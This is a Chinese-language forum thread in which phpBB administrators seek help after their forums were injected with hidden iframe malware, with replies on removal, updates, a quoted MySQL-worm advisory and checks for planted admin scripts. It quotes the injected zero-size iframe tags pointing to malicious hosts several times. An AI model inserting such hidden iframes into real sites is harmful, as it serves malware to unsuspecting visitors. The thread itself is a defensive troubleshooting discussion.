[問題] 請教各位前輩,關於被放了木馬...

[AmuroSheu]

小弟昨天接到自己站上使用者來訊說被放了木馬,
於是乎檢查了一下還真的是有之前討論串裡面提到的惡意網址被iframe加在討論區原始碼上面,小弟phpBB方面算是完全的初學者,不知道應該怎麼清除這些東西,
請各位討論區前輩不吝賜教

●小弟的討論區是架設在這個空間中http://burning-g.net/plan_1.php,小弟選擇的是G1-C型
●小弟上網方式是學術網路
●討論區版本昨天聽說被放了木馬以後就立刻先升到2.0.15版
●小弟的討論區網址:http://www.afuro.holyou.net/phpbb/

昨天聽說這樣的狀況後就決定更新2.0.15版,然後因為自己的不熟練和耍蠢稿了很久...(汗),還浪費了某位前被大哥的時間幫忙解決,真是不好意思 ,不過在更新問題底定後,還是不知道應該怎麼清除這個討厭的網址....

經過IE檢視原始檔後,發現\r
在首頁上方 討論區標題的描述那邊 敝站的"野灰色小站討論區"字串後面\r
被加上了<iframe src="http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>
以及
<iframe src="http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>

大致上是這樣,想請各位前輩幫小弟看看並且指導小弟應該怎麼處理,因為是出學者所以完全不知道怎麼改..... 謝謝各位耐心的看完這篇求救文!

[kp3011]

直接到管理台有關版面的描述中將代碼移除

[AmuroSheu]

原來如此,謝謝前輩解答!!只是不知道應該要怎麼去防範之後可能有的第二次,甚至多次被放上這些東西呢?謝謝前輩!!

[kp3011]

原來如此,謝謝前輩解答!!只是不知道應該要怎麼去防範之後可能有的第二次,甚至多次被放上這些東西呢?謝謝前輩!!

保持更新

[SimonLeung]

問題解決了，先謝！！


我也有同一個問題
NOD也測到與樓主一模一樣的情況
但我卻找不到那兩句指令\r

網址：http://www.ace-forum.net/
phpBB 2.0.15

[風中的雨]

原來如此,謝謝前輩解答!!只是不知道應該要怎麼去防範之後可能有的第二次,甚至多次被放上這些東西呢?謝謝前輩!!

保持更新

請問，已經是最近的版本2.0.15了
可是沒幾天就會被加入這些木馬指令，刪除後，隔沒幾天又出現\r
即使將論壇或資料庫換密碼，還是無法徹底改善
有方法可以阻擋嗎

[神川小羽]

有裝哪些外掛? 列個清單說明一下吧。

[阿維]

我朋友的phpBB 2.0.15他沒有安裝MOD也是三天兩頭中標
請問主機套件必須要更新到哪些版本才比較安全呢? (PHP、MySQL、GD2之類的套件)

[風中的雨]

有裝哪些外掛? 列個清單說明一下吧。

只有裝一個限制觀看會員列表和群組頁<加強版>的外掛

[神川小羽]

主機的php版本會不會是4.3.10之前的版本?
你沒有說明你的主機相關的環境以及版本，我不是很能肯定耶\r
win平台的話，這也是有可能\r

事件通告：攻擊MySQL蠕蟲，專挑懶人密碼下手 　

　 　 2005/02/02 　
　 風險等級： 警戒狀態 　
　 摘　　要： 一隻專門攻擊Windows平台上的SQL Server的蠕蟲 Spybot.ivq 近日讓設定懶人密碼的管理者頭痛了，這隻蠕蟲的感染方式是利用猜測MySQL的系統管理者密碼，猜出以後會上傳一個含 Spybot 病毒的UDF (User Defined Function) 的檔案到SQL Server上，並利用MySQL的漏洞來讓該病毒自動在受駭主機上執行，如此一來整個系統就會淪為駭客魚肉。

HiNet SOC近日發現國內已有不少用戶受駭，提醒在Windows平台的 MySQL Server 管理員注意以下解決措施：
1. 設定存取控制，禁止遠端以系統管理者權限登入\r
2. 管理者密碼勿使用易遭破解或長度過短的密碼\r
3. 系統定期更新弱點修補

目前這隻蠕蟲只對Windows上的 MySQL 產生影響，如果您不確定是否受駭，請依下列方法檢查：
1. 在資料庫中下指令：SELECT * FROM mysql.func;
2. 檢查使否含有檔名為 "app_result" 的UDF檔案
3. 檢查是否有其他非法的UDF檔案

如果有發現受駭，移除方法如下：
1. 在資料庫中下指令：DROP FUNCTION app_result;
2. 安裝防毒軟體作全系統掃毒或利用 趨勢科技線上掃毒 來清除病毒

[風中的雨]

Apache 版本 1.3.33 (Unix)
MySQL 版本 4.0.24-standard
PHP 版本 4.3.11
PERL 版本 5.8.4

上述是主機使用的版本

[俊俊]

小弟昨天接到自己站上使用者來訊說被放了木馬,
於是乎檢查了一下還真的是有之前討論串裡面提到的惡意網址被iframe加在討論區原始碼上面,小弟phpBB方面算是完全的初學者,不知道應該怎麼清除這些東西,
請各位討論區前輩不吝賜教

●小弟的討論區是架設在這個空間中http://burning-g.net/plan_1.php,小弟選擇的是G1-C型
●小弟上網方式是學術網路
●討論區版本昨天聽說被放了木馬以後就立刻先升到2.0.15版
●小弟的討論區網址:http://www.afuro.holyou.net/phpbb/

昨天聽說這樣的狀況後就決定更新2.0.15版,然後因為自己的不熟練和耍蠢稿了很久...(汗),還浪費了某位前被大哥的時間幫忙解決,真是不好意思 ,不過在更新問題底定後,還是不知道應該怎麼清除這個討厭的網址....

經過IE檢視原始檔後,發現\r
在首頁上方 討論區標題的描述那邊 敝站的"野灰色小站討論區"字串後面\r
被加上了<iframe src="http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>
以及
<iframe src="http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>

大致上是這樣,想請各位前輩幫小弟看看並且指導小弟應該怎麼處理,因為是出學者所以完全不知道怎麼改..... 謝謝各位耐心的看完這篇求救文!

請問是不是我看錯了呢? 我到你的論壇看不到有
<iframe src="http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>之類的html出現

[阿維]

抱歉,因為我那個朋友之前沒有給我主機套件資料,現在我已經拿到了

代碼: 選擇全部

Apache 版本 1.3.33 (Unix)
MySQL 版本 4.0.22-standard
PHP 版本 4.3.10
PHP 資訊 按這查看
PERL 版本 5.8.3
Kernel 版本 2.4.22-1.2199.nptlsmp
Cpanel 版本 10.2.0-STABLE-83

[神川小羽]

問個問題唷，當你們處裡掉被植入的崁入視窗之後，有沒有發現"不該存在"的檔案
通常(中這支標的會這樣啦)後台的左視窗會怪怪的
首先下載一個全新的phpbb，然後解壓縮，用全新的檔案跟你自己的檔案比對
看看有沒有，不同檔案名稱的檔案
尤其是在admin資料夾裡面，可能會多出3~4個檔案，打開來看可以發現\r
這些程式中，有簡體的注解，記憶中(上次有幫人處裡這麻煩的問題)有一個是單存的表單\r
ㄧ個是用來上傳檔案的程式，還有一個是用來執行sql的程式。

[風中的雨]

我查過了
admin裡並沒有多出來的檔案